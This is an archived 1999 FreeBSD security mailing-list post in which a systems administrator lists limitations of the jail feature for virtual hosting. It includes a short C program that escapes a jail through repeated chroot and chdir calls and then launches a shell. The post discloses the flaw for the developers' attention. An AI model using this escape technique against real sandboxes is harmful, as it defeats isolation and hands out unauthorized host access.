From owner-freebsd-security Sat Sep 25 6:17:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay2.aha.ru (relay2.aha.ru [195.2.64.35]) by hub.freebsd.org (Postfix) with ESMTP id 5353D14EB9; Sat, 25 Sep 1999 06:17:31 -0700 (PDT) (envelope-from abb@zenon.net) Received: from pb.hq.zenon.net (pb [195.2.64.18]) by relay2.aha.ru (8.9.3/8.9.3/aha-r/0.04B) with ESMTP id RAA46063; Sat, 25 Sep 1999 17:17:12 +0400 (MSD) Received: from mp.hq.zenon.net (mp [192.168.9.150]) by pb.hq.zenon.net (8.9.3/8.9.3) with ESMTP id RAA67010; Sat, 25 Sep 1999 17:17:12 +0400 (MSD) Received: (from abb@localhost) by mp.hq.zenon.net (8.9.3/8.9.3) id RAA81647; Sat, 25 Sep 1999 17:17:12 +0400 (MSD) Message-ID: <19990925171712.A80535@zenon.net> Date: Sat, 25 Sep 1999 17:17:12 +0400 From: Alexander Bezroutchko To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: about jail References: <199909251302.RAA58030@grendel.sovlink.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199909251302.RAA58030@grendel.sovlink.ru>; from NT User on Sat, Sep 25, 1999 at 05:02:30PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I am looking for a way to use jail feature (when it will be back ported to -STABLE) for providing virtual servers with root access (something like www.servetheweb.com). Therefore I am investigating this feature more closely. For now I have encountered following problems: * ping, traceroute doesn't work due to lack of permissionis to create icmp socket. I think it is simple to make workaround for such problems: create a daemon listening on a unix domain socket for request from a jail. Daemon will take request and the pid of requesting process, validate it, process and return answer to client. * only one IP address is available in jail It is acceptable limitation, but some daemons would like to use localhost address (127.0.0.1). * whole kernel MIB is readable, and kern.hostname is writable from jail I think we should restrict information about system available from jail -- leave readable only data required for proper work of libc functions like gethostname,getpagesize,sysconf, etc. If we leave kern.hostname writable from jail, we should add new field to `struct jail', say `jailname'. It is necessary to iidentify exactly which jail a process belongs to. And /proc//status must show this value. (I think it will be useful to add displaying `jailname' to ps and probably top). * scheduling Scheduler must provide equal time quantum to each jail. I think something like "fair share scheduler" required. Is there any plans to implement such scheme in FreeBSD ? * resource limits Current resource limit scheme does not provide enough isolation of jails. For example, chgproccnt() maintains counters of number of process per uid, but it they are system-wide. So number of process running in one jail will affect fork() at another jail. Also it would be great to have ability to limit number of simultaneous processes running in jail and memory consumed by whole jail. * it is possible to escape from jail Following program escapes from jail (tested under 4.0-19990918-CURRENT): /* --- start of example ------------------------- */ #include #include const char *shell = "/bin/sh"; const char *lowerdir = "/tmp"; int main() { int i; assert(chdir("/") != -1); assert(chroot(lowerdir) != -1); for (i = 0; i < 32; i++) assert(chdir("..") != -1); assert(chroot(".") != -1); assert(execl(shell, shell, NULL) != -1); }; /* --- end of example --------------------------- */ Does anybody know where I can find more information about well known methods of breaking chroot ? Does anybody already encountered and solved problems described above or have an ideas ? -- Alexander Bezroutchko, Systems Administrator, Zenon N.S.P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message